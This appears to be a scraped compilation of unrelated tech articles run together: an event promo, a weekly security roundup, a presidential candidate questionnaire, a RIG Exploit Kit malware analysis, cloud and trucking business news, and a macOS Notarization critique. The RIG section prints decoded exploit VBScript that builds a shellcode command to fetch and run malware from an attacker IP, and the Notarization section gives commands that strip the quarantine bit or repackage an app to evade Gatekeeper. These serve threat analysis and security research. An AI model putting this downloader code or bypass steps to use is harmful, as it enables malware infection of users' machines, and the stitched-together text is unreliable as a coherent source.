Hear how to build a billion-dollar SaaS company at TechCrunch Disrupt

There was a time when brick-and-mortar mom-and-pops framed their first $1 on the wall; for a SaaS startup, the equivalent milestone is a $1 billion revenue run rate.

Salesforce is the SaaS revenue king, reporting $4 billion in revenue in its most recent quarter, and many other relatively new SaaS companies, such as Workday, ServiceNow and Atlassian, have broken the $1 billion barrier.

This year at TechCrunch Disrupt (tickets here!), we welcome three people to the Extra Crunch stage who know firsthand what it takes to join the billion-dollar club.

Neeraj Agrawal, a partner at Battery Ventures and seasoned enterprise investor, presented his growth thesis in a widely read article for TechCrunch in which he outlined the key milestones for a SaaS company to reach a billion dollars.

Whitney Bouck is COO at HelloSign, a startup that was sold to Dropbox in 2018 for $230 million. Bouck was also an executive at Box, guiding their enterprise business from 2011-2015. Prior to that she was at Documentum, which exited in 2003 to EMC for $1.7 billion.

Jyoti Bansal is currently co-founder & CEO of Harness. Previously, he was founder & CEO of AppDynamics, which Cisco acquired in 2017 for $3.7 billion. Bansal is also an investor as co-founder of venture capital firm Unusual Ventures.

The goal of this panel is to help you understand the tools and strategies that go into ramping to a billion in revenue and beyond. It requires a rare combination of a good idea, product-market fit, culture and commitment. It also requires figuring out how to evolve the core idea and recover from inevitable mistakes — all while selling investors on your vision.

We’re amped for this conversation, and we can’t wait to see you there! Buy tickets to Disrupt SF here at an early-bird rate!

Did you know Extra Crunch annual members get 20% off all TechCrunch event tickets? Head over here to get your annual pass, and then email extracrunch@techcrunch.com to get your 20% discount. Please note that it can take up to 24 hours to issue the discount code.


The Good, the Bad and the Ugly in Cybersecurity – Week 37


The Good

Good news for privacy advocates. Rising from the ashes of Mozilla’s twice-reincarnated Test Pilot program is a new, privacy-centric third attempt. The first beta out the door is a desktop extension offering the ‘Firefox Private Network’, aka a free (at least for the time being) VPN to keep your internet surfing away from prying eyes. Anything that helps protect user privacy is always a net good in our eyes.

image of firefox vpn

Following New Bedford’s lead last week, the 22 Texas local governments hit by ransomware last month have disappointed greedy hackers hoping for a $2.5 million payday. The state’s Department of Information Resources says that its coordinated incident response plan has been a “tremendous success” and that over half of the “impacted entities” are now operating normally. Taxpayers, of course, still have to foot the bill for the state’s valiant recovery efforts, an unsavory fact that only underlines the necessity of having a solution in place to begin with that can detect and block ransomware before it gains a foothold.

The Bad

A newly discovered Intel side-channel vulnerability allows attackers to send maliciously crafted packets to a target system and spy on encrypted SSH sessions in real time. The vulnerability requires the victim to be running with RDMA (Remote Direct Memory Access) enabled. Dubbed ‘Network Cache Attack’, or NetCAT (not that netcat), the flaw could be exploited to conduct a keystroke timing analysis and predict the text being typed in the SSH session. The researchers estimate such an attack would have an 85% chance of correctly predicting the typed text.
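To see why keystroke timing leaks information at all, here is a toy illustration (not the NetCAT attack itself; the latency profile below is made-up for demonstration): an observer who can recover keystroke arrival times can match the gaps between keystrokes against typical per-key-pair typing latencies.

```python
def inter_arrival(timestamps):
    """Return the gaps between consecutive keystroke timestamps (ms)."""
    return [b - a for a, b in zip(timestamps, timestamps[1:])]

# Hypothetical per-digraph latency profile (illustrative numbers only);
# real attacks train such profiles on large typing datasets.
profile = {"th": 90, "he": 110, "qz": 240}

def closest_digraph(gap, profile):
    """Guess the key pair whose typical latency is nearest to the observed gap."""
    return min(profile, key=lambda d: abs(profile[d] - gap))

gaps = inter_arrival([0, 92, 200])          # observed packet times
guesses = [closest_digraph(g, profile) for g in gaps]
```

This is why the researchers report a probabilistic success rate (85%) rather than exact recovery: the mapping from timing to text is statistical, not deterministic.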

The Ugly

Chromebook users are being warned of a security vulnerability in the Chrome OS “built-in security key” feature. If you’ve never heard of it you can probably relax, but the experimental feature is supposed to act as a universal 2nd factor (U2F) security key. U2F security keys are intended to support 2FA by ensuring only someone with a particular physical device can access your accounts. Alas, Google dropped the ball on this one, and it turns out that attackers who observe the signature produced by the U2F authenticator can break it to reveal the private key. With that, they could potentially sign in to users’ website accounts without needing access to the Chrome OS device itself.

image of chrome vulnerability alert

The vulnerability affects 70 different models of Chromebook, and users of the feature are urged to ensure they’re running Chrome OS version 75 or later (which includes an automatic firmware update). Full remediation isn’t pretty, however, and involves a number of steps, as detailed here.   

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Ten questions for 2020 presidential candidate John Delaney

In November 2020, America will go to the polls to vote in perhaps the most consequential election in a generation. The winner will lead the country amid great social, economic and ecological unrest. The 2020 election will be a referendum on both the current White House and the direction of the country at large.

Nearly 20 years into the young century, technology has become a pervasive element in all of our lives, and will only grow more important. Whoever takes the oath of office in January 2021 will have to answer some difficult questions, ranging from an impending climate disaster to concerns about job loss at the hands of robotics and automation.

Many of these questions are overlooked in day-to-day coverage of candidates and during debates. In order to better address the issues, TechCrunch staff has compiled a 10-part questionnaire across a wide range of tech-centric topics. The questions have been sent to national candidates, regardless of party. We will be publishing the answers as we receive them. Candidates are not required to answer all 10 in order for us to publish, but we will be noting which answers have been left blank.

First up is former Congressman John Delaney. Prior to being elected to Maryland’s 6th Congressional District, Delaney co-founded and led healthcare loan service Health Care Financial Partners (HCFP) and commercial lender CapitalSource. He was elected to Congress in 2013, beating out a 10-term Republican incumbent. Rumored to be weighing a 2018 bid against Maryland governor Larry Hogan, Delaney instead announced plans to run for president in 2020.

1. Which initiatives will you prioritize to limit humankind’s impact on climate and avoid potential climate catastrophe?

My $4 trillion Climate Plan will enable us to reach the goal of net zero emissions by 2050, which the IPCC says is the necessary target to avoid the worst effects of climate change. The centerpiece of my plan is a carbon-fee-and-dividend that will put a price on carbon emissions and return the money to the American people through a dividend. My plan also includes increased federal funding for renewable energy research, advanced nuclear technologies, direct air capture, a new Climate Corps program, and the construction of the Carbon Throughway, which would transport captured carbon from all over the country to the Permian Basin for reuse and permanent sequestration.

2. What is your plan to increase black and Latinx startup founders’ access to funding?

As a former entrepreneur who started two companies that went on to be publicly traded, I am a firm believer in the importance of entrepreneurship. To ensure people from all backgrounds have the support they need to start a new business, I will create nonprofit banks to serve economically distressed communities, launch a new SBIC program to help provide access to capital to minority entrepreneurs, and create a grant program to fund business incubators and accelerators at HBCUs. Additionally, I pledge to appoint an Entrepreneurship Czar who will be responsible for promoting entrepreneurship-friendly policies at all levels of government and encouraging entrepreneurship in rural and urban communities that have been left behind by venture capital investment.

3. Why do you think low-income students are underrepresented in STEM fields and how do you think the government can help fix that problem?

I think a major part of the problem is that schools serving low-income communities don’t have the resources they need to provide a quality STEM education to every student. To fix that, I have an education plan that will increase investment in STEM education and use Title I funding to eliminate the $23 billion annual funding gap between predominantly white and predominantly black school districts. To encourage students to continue their education after they graduate from high school and ensure every student learns the skills they need, my plan also provides two years of free in-state tuition and fees at a public university, community college, or technical school to everyone who completes one year of my mandatory national service program.

4. Do you plan on backing and rolling out paper-only ballots or paper-verified election machines? With many stakeholders in the private sector and the government, how do you aim to coordinate and achieve that?

Making sure that our elections are secure is vital, and I think using voting machines that create a voter-verified paper record could improve security and increase voters’ confidence in the integrity of our elections. To address other facets of the election security issue, I have proposed creating a Department of Cybersecurity to help protect our election systems, and while in Congress I introduced election security legislation to ensure that election vendors are solely owned and controlled by American citizens.

5. What, if any, federal regulation should be enacted for autonomous vehicles?

I was proud to be the founder of the Congressional Artificial Intelligence Caucus, a bipartisan group of lawmakers dedicated to understanding the impacts of advances in AI technology and educating other legislators so they have the knowledge they need to enact policies that ensure these innovations benefit Americans. We need to use the legislative process to have a real conversation involving experts and other stakeholders in order to develop a comprehensive set of regulations regarding autonomous vehicles, which should include standards that address data collection practices and other privacy issues as well as more fundamental questions about public safety.

6. How do you plan to achieve and maintain U.S. superiority in space, both in government programs and private industry?

Space exploration is tremendously important to me as a former Congressman from Maryland, the home of NASA’s Goddard Space Flight Center, major space research centers at the University of Maryland, and many companies that develop crucial aerospace technologies. As president, I will support the NASA budget and will continue to encourage innovation in the private sector.

7. Increased capital in startups founded by American entrepreneurs is a net positive, but should the U.S. allow its businesses to be part-owned by foreign governments, particularly the government of Saudi Arabia?

I am concerned that joint ventures between U.S. businesses and foreign governments, including state-owned enterprises, could facilitate the theft of intellectual property, potentially allowing foreign governments to benefit from taxpayer-funded research. We need to put in place greater protections that defend American innovation from theft.

8. Will U.S.-China technology decoupling harm or benefit U.S. innovation and why?

In general, I am in favor of international technology cooperation but in the case of China, it engages in predatory economic behavior and disregards international rules. Intellectual property theft has become a big problem for American businesses as China allows its companies to steal IP through joint ventures. In theory, U.S.-China collaboration could advance technology and innovation but without proper IP and economic protections, U.S.-China joint ventures and partnerships can be detrimental to the U.S.

9. How large a threat does automation represent to American jobs? Do you have a plan to help train low-skilled workers and otherwise offset job loss?

Automation could lead to the disruption of up to 54 million American jobs if we aren’t prepared and we don’t have the right policies. To help American workers transition to the high-tech, high-skill future economy, I am calling for a national AI strategy that will support public/private AI partnerships, develop a social contract with the communities that are negatively impacted by technology and globalization, and create updated education and job training programs that will help students and those currently in the workforce learn the skills they need.

To help provide jobs to displaced workers and drive economic growth in communities that suffer negative effects from automation, I have proposed a $2 trillion infrastructure plan that would create an infrastructure bank to facilitate state and local government investment, increase the Highway Trust Fund, create a Climate Infrastructure Fund, and create five new matching funds to support water infrastructure, school infrastructure, deferred maintenance projects, rural broadband, and infrastructure projects in disadvantaged communities in urban and rural areas. In addition, my proposed national service program will create new opportunities that allow young adults to learn new skills and gain valuable work experience. For example, my proposal includes a new national infrastructure apprenticeship program that will award a professional certificate proving mastery of particular skill sets for those who complete the program.

10. What steps will you take to restore net neutrality and assure internet users that their traffic and data are safe from manipulation by broadband providers?

I support the Save Net Neutrality Act to restore net neutrality, and I will appoint FCC commissioners who are committed to maintaining a fair and open internet. Additionally, I would work with Congress to update our digital privacy laws and regulations to protect consumers, especially children, from their data being collected without consent.

RIG Exploit Kit Chain Internals

The Zero2Hero malware course continues with Vitali Kremez explaining the RIG Exploit Kit and the infection chain internals that led to the Amadey Stealer and Clipboard Hijacker.


Exploit kits delivered via drive-by infections remain one of the active malware distribution vectors. Exploit kits (EKs) comprise several components, from landing-page filtering to serving the relevant browser exploit, with the end goal of downloading and running the attacker’s malware of choice on the victim host.


Exploit kits experienced their heyday in 2012-2014, from the Blackhole Exploit Kit distribution to the Angler (XXX) Exploit Kit, before their eventual demise. In many cases, some of the most high-profile, sophisticated exploit kits disappeared due to significant law enforcement operations, which led to the arrest of the main developer behind Blackhole EK, operating under the alias “Paunch,” as well as the Lurk cybercrime group takedown with the supposed arrest of “JP Morgan” in Russia.

In 2019, exploit kits are not as popular or effective as they once were, possibly due to the lack of reliable exploit providers, a diminished underground economy for browser exploits, and a less professionalized approach to exploit development.

Recent exploit kits leverage known vulnerabilities with openly available proof-of-concept (PoC) code found on various file-sharing websites and platforms.

Among the most popular are the Fallout Exploit Kit and RIG Exploit Kit, with monthly subscription prices ranging from $700 to $2,000 USD. The majority of the exploit kit clientele are Russian-speaking cybercrime malware distributors; moreover, the exploit kit administrators themselves routinely refuse to rent the EK to English-speaking customers.

Reversing RIG Exploit Kit Infection Chain Internals Leading to “Amadey” Stealer & Clipboard Hijacker

We analyzed the latest malvertising campaign leading to the RIG Exploit Kit (RigEK) serving the Amadey stealer and a clipboard hijacker. RigEK leverages a so-called “gate,” a simple website that redirects victim traffic to the eventual RigEK landing page, which ultimately leads to the malware deployment.

Reverse Engineering Steps:

(1) Obtain the RigEK traffic response from Fiddler.

(2) Debug the landing page by setting a breakpoint on the function return and copying the decoded exploit payload function.

(3) Observe the full decoded VBS code from RigEK’s CVE-2018-8174 function, which is almost an exact copy of the public “CVE-2018-8174” proof of concept on GitHub.

CVE-2018-8174 is also known as the “Windows VBScript Engine Remote Code Execution Vulnerability.” The exploit relies on the predictability of memory allocation to trigger an exploitable use-after-free (UAF) condition.

image of RIG EX Use after free

(4) Observe the additional Flash exploit served, CVE-2018-4878, also exploiting a UAF and compiled with the attacker path “C:UsersLAPTOPDesktopflash_exfl2;;MainExp.as”.

image of flash exploit

(5) Finally, observe the malware drop from the RigEK leveraging the exploit.

The “CVE-2018-8174” exploit allows remote code execution and transfers control to the following decoded, beautified command, which downloads an encoded binary, decrypts it, and runs the malware.

The shortened relevant function, decoded with the key cNNN9ka, is as follows:

Function getegeheteegegegege()
    strString = "http://188[.]225[.]38[.]230/?REDACTED=detonator&ZqRgBa=known&DfJxlEZfMVoIe=known&gbamqKD=criticized&euxSkuKQYdMrM=already&ykPInPSwC=everyone&ffhd3s=REDACTED&LICFHL=blackmail&HZVhikQO=known&REDACTED=known&CRaWMKEIj=strategy&QhEkGOZo=criticized&REDACTED=strategy&zjpIGBzNgKtU=golfer&t4gdfgf4=REDACTED&hyrfspovuyAMY=blackmail&REDACTED=referred&REDACTED"
    linkHex = ""

    ' Hex-encode the payload URL, one character at a time
    For i = 1 To Len(strString)
        linkHex = linkHex + Hex(Asc(Mid(strString, i, 1)))
    Next

    key = "cNNN9ka"

    ' Hex-encode the key the same way
    linkHex2 = ""
    For i = 1 To Len(key)
        linkHex2 = linkHex2 + Hex(Asc(Mid(key, i, 1)))
    Next

    slang = "22"
    sla = "20"
    nulla = "00000000"

    ' Shellcode prefix elided ("...") in the original capture
    str = "E" + " ... " + linkHex2 + slang + sla + slang + linkHex + slang + sla + slang + "A4" + slang + nulla
End Function
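For readers who want to follow the encoding step, here is a short Python equivalent of the VBScript’s Hex(Asc(...)) loop (function and variable names are ours, and the URL below is a placeholder, not the real payload address):

```python
def vbs_hex(s):
    """Replicate VBScript's Hex(Asc(c)) concatenation: each character
    becomes its uppercase hex ASCII value, with no separator or padding."""
    return "".join(format(ord(c), "X") for c in s)

# The exploit encodes both the payload URL and the key this way
# before splicing them into the shellcode string.
key_hex = vbs_hex("cNNN9ka")
url_hex = vbs_hex("http://example[.]test/payload")  # placeholder URL
```

The constants "22" and "20" spliced between the segments are the hex values of the double-quote and space characters, which delimit the arguments inside the final shellcode-driven command line.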



Indicators of Compromise (IOCs):

Amadey Stealer (SHA-256): fdf7be93b386b9ed27785f605b9de023dc71e0b1b4ac5d34c60b076043083eb7

Clipboard Hijacker (SHA-256): 23367aa96d6969d17dfa01dde3dd9ce7436be7dbfb7c585c8ead2af926872fb7

RigEK Gate: bitcoinsmaker[.]site 

RigEK Server Landing: 188[.]225[.]38[.]230


IBM brings Cloud Foundry and Red Hat OpenShift together

At the Cloud Foundry Summit in The Hague, IBM today showcased its Cloud Foundry Enterprise Environment on Red Hat’s OpenShift container platform.

For the longest time, the open-source Cloud Foundry Platform-as-a-Service ecosystem and Red Hat’s Kubernetes-centric OpenShift were mostly seen as competitors, with both tools vying for enterprise customers who want to modernize their application development and delivery platforms. But a lot of things have changed in recent times. On the technical side, Cloud Foundry started adopting Kubernetes as an option for application deployments and as a way of containerizing and running Cloud Foundry itself.

On the business side, IBM’s acquisition of Red Hat has brought along some change, too. IBM long backed Cloud Foundry as a top-level foundation member, while Red Hat bet on its own platform instead. Now that the acquisition has closed, it’s maybe no surprise that IBM is working on bringing Cloud Foundry to Red Hat’s platform.

For now, this work is officially still a technology experiment, but our understanding is that IBM plans to turn this into a fully supported project that will give Cloud Foundry users the option to deploy their applications right to OpenShift, while OpenShift customers will be able to offer their developers the Cloud Foundry experience.

“It’s another proof point that these things really work well together,” Cloud Foundry Foundation CTO Chip Childers told me ahead of today’s announcement. “That’s the developer experience that the CF community brings and in the case of IBM, that’s a great commercialization story for them.”

While Cloud Foundry isn’t seeing the same hype as in some of its earlier years, it remains one of the most widely used development platforms in large enterprises. According to the Cloud Foundry Foundation’s latest user survey, the companies that are already using it continue to move more of their development work onto the platform, and according to code analysis from source{d}, the project continues to see over 50,000 commits per month.

“As businesses navigate digital transformation and developers drive innovation across cloud native environments, one thing is very clear: they are turning to Cloud Foundry as a proven, agile, and flexible platform — not to mention fast — for building into the future,” said Abby Kearns, executive director at the Cloud Foundry Foundation. “The survey also underscores the anchor Cloud Foundry provides across the enterprise, enabling developers to build, support, and maximize emerging technologies.”

Also at this week’s Summit, Pivotal (which is in the process of being acquired by VMware) is launching the alpha version of the Pivotal Application Service (PAS) on Kubernetes, while Swisscom, an early Cloud Foundry backer, is launching a major update to its Cloud Foundry-based Application Cloud.

SmartDrive snaps up $90M for in-truck video telematics solutions for safety and fuel efficiency

Trucks and other large commercial vehicles are the biggest whales on the road today — and, by virtue of that size, they are also some of the most dangerous and inefficient when driven badly. Today, a startup that has built a platform aimed at improving both of those areas has raised a large round of funding to continue fuelling (so to speak) its own growth: SmartDrive, a San Diego-based provider of video-based telematics and transportation insights, has snapped up a round of $90 million.

The company is not disclosing its valuation but according to PitchBook, it was last valued (in 2017) at $290 million, which would put the valuation now around $380 million. But given that the company has been growing well — it says that in the first half of this year, its contracted units were up 48%, while sales were up by 44% — that figure may well be higher. (We are asking.)

The funding comes at an interesting time for fleet management and the trucking industry. A lot of the big stories about automotive technology at the moment seem to be focused on autonomous vehicles for private usage, but that leaves a large — and largely legacy — market in the form of fleet management and commercial vehicles.

That’s not to say it’s been completely ignored, however. Bigger companies like Uber, Tesla and Volvo, and startups like Nikola, are all building smarter trucks, and just yesterday Samsara, which makes an industrial IoT platform that works, in part, to provide fleet management to the trucking industry, raised $300 million on a $6.3 billion valuation.

The telematics market was estimated to be worth $25.5 billion in 2018 and is forecast to grow to some $98 billion by 2026.

The round was led by TPG Sixth Street Partners, a division of investment giant TPG (which backs the likes of Spotify and many others), which earlier this year was raising a $2 billion fund for growth-stage investments. Unnamed existing investors also participated. The company prior to this had raised $230 million, with other backers including Founders Fund, NewView Capital, Oak Investment Partners, Michelin and more. (NEA had also been an investor but has more recently sold its stake.)

SmartDrive has been around since 2005 and focuses on a couple of key areas. Tapping data from the many sensors that you have today in commercial vehicles, it builds up a picture of how specific truckers are handling their vehicles, from their control on tricky roads to what gears and speed they are using as they go up inclines, and how long they idle their engines. The resulting data is used both to provide a better picture to fleet managers of that performance, and to highlight specific areas where the trucker can improve his or her performance, and how.

Analytics and data provided to customers include multi-camera 360-degree views, extended recording and U-turn triggering, along with diagnostics on specific driver performance. The company claims that the information has led to more satisfaction among drivers and customers, with driver retention rates of 70% or higher and improvements to 9 miles per gallon (mpg) on trips, versus industry averages of 20% driver retention and 6 mpg.

“This is an exciting time at SmartDrive and in the transportation sector overall as adoption of video-based telematics continues to accelerate,” stated Steve Mitgang, SmartDrive CEO, in a statement. “Building on our pioneering video-based safety program, our vision of an open platform powering best-of-breed video, compliance and telematics applications is garnering significant traction across a diverse range of fleets given the benefits of choice, flexibility and a lower total cost of ownership. The investment from TPG Sixth Street Partners and our existing investors will fuel continued innovation in areas such as computer vision and AI, while also enhancing sales and marketing initiatives and further international expansion.”

The focus for SmartDrive seems to be on how drivers are doing in specific circumstances: it doesn’t seem to suggest whether there could have been better routes, or if better fleet management could have resulted in improved performance. (That could be one area where it grows, or fits into a bigger platform, however.)

“SmartDrive is a market leader in the large and expanding transportation safety and intelligence sector and we are pleased to be investing in a growing company led by such a talented team,” noted Bo Stanley, partner and co-head of the Capital Solutions business at TPG Sixth Street Partners, in a statement. “SmartDrive’s proprietary data analytics platform and strong subscriber base put it in a great position to continue to capitalize on its track record of innovation and the broader secular trend of higher demand for safer and smarter transportation.”

The mainframe business is alive and well, as IBM announces new z15

It’s easy to think about mainframes as some technology dinosaur, but the fact is these machines remain a key component of many large organizations’ computing strategies. Today, IBM announced the latest in their line of mainframe computers, the z15.

For starters, as you would probably expect, these are big and powerful machines capable of handling enormous workloads. For example, this baby can process up to 1 trillion web transactions a day and handle 2.4 million Docker containers, while offering unparalleled security to go with that performance. This includes the ability to encrypt data once, and it stays encrypted, even when it leaves the system, a huge advantage for companies with a hybrid strategy.

Speaking of which, you may recall that IBM bought Red Hat last year for $34 billion. That deal closed in July and the companies have been working to incorporate Red Hat technology across the IBM business including the z line of mainframes.

IBM announced last month that it was making OpenShift, Red Hat’s Kubernetes-based cloud-native tools, available on the mainframe running Linux. This should enable developers, who have been working on OpenShift on other systems, to move seamlessly to the mainframe without special training.

IBM sees the mainframe as a bridge for hybrid computing environments, offering a highly secure place for data that when combined with Red Hat’s tools, can enable companies to have a single control plane for applications and data wherever it lives.

While it could be tough to justify the cost of these machines in the age of cloud computing, Ray Wang, founder and principal analyst at Constellation Research, says it could be more cost-effective than the cloud for certain customers. “If you are a new customer, and currently in the cloud and develop on Linux, then in the long run the economics are there to be cheaper than public cloud if you have a lot of IO, and need to get to a high degree of encryption and security,” he said.

He added, “The main point is that if you are worried about being held hostage by public cloud vendors on pricing, in the long run the z is a cost-effective and secure option for owning compute power and working in a multi-cloud, hybrid cloud world.”

Companies like airlines and financial services companies continue to use mainframes, and while they need the power these massive machines provide, they need to do so in a more modern context. The z15 is designed to provide that link to the future, while giving these companies the power they need.

macOS Notarization: Security Hardening or Security Theater?

Earlier this year, Apple introduced a new security measure called ‘Notarization’ to complement their existing strategies like Gatekeeper, XProtect, and the Malware Removal Tool. It would be fair to say that there’s been a bit of confusion and not a little pushback from developers about this new security measure. In this post, we’ll look at what Notarization is, why Apple have introduced it, and why it’s proving controversial among developers. We’ll also address the most important question for macOS users: will Apple’s Notarization requirement make your Mac more secure from malware? Let’s find out.

image of notarization

What is Notarization?

That should be a simple question to answer, but as we’ll see, Apple have been shifting the ground on this and a lack of clarity over what Notarization is and what it requires has caused some upset among the developer community.

image of apple news

According to Apple, Notarization is a process whereby all 3rd party software distributed outside of the Mac App Store must be uploaded to Apple’s servers and checked for malware. If the software passes Apple’s malware scan check, its details are added to Apple’s database of “safe” or at least “allowed” software. Developers in return receive an electronic “ticket” which can be attached to the software by the developer when they distribute it. Where Notarization is not yet compulsory (i.e., macOS Mojave), Notarized apps present a slightly different warning from Gatekeeper than unnotarized apps, which supposedly tells users that the software they are about to launch has passed Apple’s checks.

Put like that, Notarization sounds good for both users and developers. Users get extra confidence that the apps they download are malware-free, and developers get a way to show users that their apps are safe. Sounds great, but there have been a few wrinkles, not only in implementation but also in design, that have, shall we say, upset the Apple cart.
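For a sense of what this looks like from the developer’s side, here is a rough sketch of the submission workflow using the altool and stapler utilities that ship with Xcode. The bundle identifier, Apple ID, app name and keychain item below are placeholders, not values from this article:

```shell
# Zip the signed app for upload (ditto preserves metadata that plain zip can lose)
/usr/bin/ditto -c -k --keepParent "MyApp.app" "MyApp.zip"

# Upload to Apple's notary service for the malware scan
xcrun altool --notarize-app \
    --primary-bundle-id "com.example.myapp" \
    --username "dev@example.com" \
    --password "@keychain:AC_PASSWORD" \
    --file "MyApp.zip"

# Poll for the result using the RequestUUID returned by the upload
xcrun altool --notarization-info "<RequestUUID>" \
    --username "dev@example.com" \
    --password "@keychain:AC_PASSWORD"

# On success, staple the resulting ticket to the app before distribution
xcrun stapler staple "MyApp.app"
```

Note that the upload and the ticket issuance are asynchronous, which is the source of the workflow delays discussed below.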

Enter The Hardened Runtime…Or Not

When Apple first introduced Notarization as an optional requirement in Mojave 10.14.5, it laid out very clear rules about what developers would have to do. One of the requirements was that developers build their software with the Hardened Runtime enabled. This requires developers to jump through a few hoops to ensure they won’t lose necessary functionality, and it is signified by a flag in the code signature which tells the OS to treat the executable somewhat like Apple’s own SIP-protected executables. The existence of the flag will prevent other processes (like a debugger or decompiler) from attaching to the executable, and will block code injection, dylib hijacking and several other techniques.
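For illustration, opting in to the hardened runtime is done at signing time with the `--options runtime` flag; the signing identity below is a placeholder:

```shell
# Sign with the hardened runtime enabled ('runtime' sets the flag in the signature)
codesign --force --options runtime --timestamp \
    --sign "Developer ID Application: Example Corp (ABCDE12345)" "MyApp.app"

# Verify: the CodeDirectory flags should include 0x10000 (runtime)
codesign --display --verbose "MyApp.app"
```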

As explained in Howard Oakley’s post “Notarization devalued?”, Apple later decided to encourage developers to have all their software uploaded and scanned by their Notary service, even software that would never be used on newer versions of macOS or which could not, for various reasons, be built with the new hardened runtime.

More recently, in yet a third change, Apple have temporarily dropped the stricter requirements that they originally insisted on.

image of third notarization change

In short, it now turns out that the only thing currently required for Notarization is the malware check itself. A fourth change is due in January 2020: at that time, Apple intends to revert to the strict requirements initially announced.

Who’s Got A Ticket To Ride?

As mentioned above, when an application is successfully notarized, Apple also issues the developer with a “ticket” which they can then attach to their software prior to distribution. The ticket is basically there to take care of the situation when a user tries to launch a Notarized app but has no connection to the internet or Apple’s Notarization servers are down. The ticket says “No need to check, I’m notarized.” This obviously has great benefit to Apple, reducing the burden on their servers, but many developers have balked at the clumsy tooling and inevitable delay between building, notarizing and receiving the ticket. The delay is currently only around a few minutes when everything is working properly, but if it’s not, it’s possible that developers may be stuck in limbo waiting for Apple’s servers to respond.

If you’re running Mojave 10.14.5 or later and you have the Xcode Command Line tools installed, you can easily do a quick check of which apps are currently notarized and stapled with a ticket in your /Applications folder like this:

for i in /Applications/*; do stapler validate "${i}" | grep -B 1 worked; done

image of checking for notarized apps

Tickets are, technically, optional. Developers don’t have to staple them to their software when they distribute their app, and doing so is cumbersome for automated workflows as indicated above. However, by not stapling the ticket, developers run the real risk that their app might fail to run on launch if the user’s device cannot connect to Apple’s servers at that time. Given that possibility, very few developers would consider that an “option” and feel forced into adjusting their workflow to accommodate Apple’s changes.

Why Did Apple Introduce Notarization?

Given the extra burden on developers, it’s worth stopping to reflect on why Apple are keen on Notarization. The company recognizes the need for a ‘defense in depth’ strategy, and Notarization is ostensibly another layer of added security for end users. One might hope that Notarization is an attempt to stem the flood of adware, PUPs (potentially unwanted programs) and PPI (pay-per-install) “badware” that has been afflicting macOS users for some time now. Apple have been struggling to keep up with revoking developer signatures, and the XProtect and MRT tools are simply not built to recognize the simple, automated changes that rogue developers can use to make their software invisible to Apple’s tools. Since Notarization on the forthcoming Catalina and beyond will prevent the launch of any software that Apple has not already received a copy of, presumably Apple will be able to add more fine-grained signatures to their Notarization malware scan over time. In effect, Notarization should serve as a kind of ‘XProtect in the Cloud’, allowing Apple to refine their detections and knock out larger classes of unwanted software globally simply by refusing or revoking Notarization status.

Will Notarization Defeat Malware?

That sounds plausible, and worthy, but Apple have been historically unwilling to revoke the signatures of a number of developers who distribute PUPs and who manage to stay within the letter of the law while infuriating users. As far as out-and-out malware goes, the real test of whether Notarization will make any difference will depend on what exactly the “malware scan” involves. As ever with the Cupertino outfit, that remains opaque.

Interestingly, we’ve already seen malware authors adopting the hardened runtime themselves, although to what end it’s not clear.

image of malware with hardened runtime

It fails as an anti-analysis strategy, since it’s a simple matter for researchers to bypass the hardened runtime flag. More likely, I suspect, is that malware authors have been testing Apple’s Notarization service to see where and how their creations are caught. Apple helpfully provides a full error log on failed Notarization requests, which may be useful to that end, so it’s at least possible, if not likely, that bad actors will figure out through trial-and-error what they can get away with.

Moreover, while bundles, packages and disk images require Notarization, it remains the case that not all file formats can be notarized or stapled with a ticket. In particular, this new technology is not going to affect any malware that simply runs a script or stand-alone executable. Scripts are increasingly common in adware and malware installers like Shlayer. Although these face the usual Gatekeeper checks, they are not subject to Notarization.

image of player command

New Technology Bypassed By Old Tricks

A large part of why some developers feel that Notarization is more security theater than true security hardening is that while it requires the good guys to adapt to new requirements, bad actors already have the tools and techniques they need to bypass Notarization checks.

As mentioned above, scripts and standalone binaries are not subject to Notarization, since Apple’s “stapling” technology cannot be applied to these. Notarization checks also only apply to quarantined and “gatekeepered” apps. As we’ve discussed before, the very simple bypass for all of Apple’s security technologies is simply to remove the quarantine bit.

Here’s a simple demonstration. In this example, I’ve chosen a free 3rd party application called “Slimjet.app”. I must stress I have absolutely no knowledge of this application and I am not suggesting there is anything wrong with it. I chose it because it was the first unnotarized application I came across on a 3rd party distribution site. If we download and try to install this application on a system where Notarization is enforced, Gatekeeper will block it because, although it is correctly codesigned, it is not notarized. So far so good.

image of unnotarized app

But there are (at least) two simple ways around this, both of which are old tricks. First, we can simply remove the quarantine bit with xattr. It is still the case that this can be done by a process – such as a malicious installer script – without elevating privileges. The app will now run without complaint from Gatekeeper.
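As a sketch of that first trick, using the app path from this example (adjust to wherever the bundle actually lands):

```shell
# Show the quarantine attribute that Gatekeeper keys off
xattr -p com.apple.quarantine "/Applications/Slimjet.app"

# Strip it recursively from the whole bundle; no elevated privileges needed
xattr -rd com.apple.quarantine "/Applications/Slimjet.app"
```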

image of slimjet browser

Second, we can build the app into an installer package with pkgbuild and use that to install the app without setting the quarantine bit.

pkgbuild --component "/Volumes/FlashPeak Slimjet/FlashPeak Slimjet.app" --install-location /Applications ~/Desktop/slimejet.pkg
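The resulting package can then be installed either by double-clicking it or from the command line; either way, the app it drops into /Applications carries no quarantine attribute:

```shell
# Install the package payload; the dropped app is not quarantined
sudo installer -pkg ~/Desktop/slimejet.pkg -target /
```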

Apple have said that installer packages signed with Developer IDs must also be notarized, but that does not stop us from creating an unsigned installer package with something like the code above and then using simple social engineering tricks to convince the user to right-click ‘open’ it.

If that strikes you as unlikely, reflect on the fact that we see infections on a daily basis for unsigned code that use this exact trick. Here, for example, is a malicious application on a disk image that helpfully provides the victim with simple images showing exactly what they should do to launch it:

image of malware installer

The proof that this is a tried-and-trusted technique lies in the simple fact that these kinds of installers are rampant in the wild, and attackers don’t stick with unsuccessful strategies.

Notarization doesn’t raise the bar here for unsigned packages like the one we created above because the unsigned installer isn’t subject to a Notarization check. The app the package drops is, as we mentioned, free of the quarantine bit and so it too will not have to pass Notarization or any other Gatekeeper checks.


It’s hard to knock Apple for effort. They are clearly paying a lot of attention to security issues on macOS, but the Notarization requirements suffer the same flaw as other built-in technologies; namely, relying on the easily-removed and not always respected com.apple.quarantine bit. Meanwhile, developers and end users alike are being forced through a succession of hoops and dialogs. Given the simplicity of bypassing all this extra effort, don’t be surprised if Notarization makes very little impact on the current state of adware, PUPs and malware on macOS.


ScyllaDB takes on Amazon with new DynamoDB migration tool

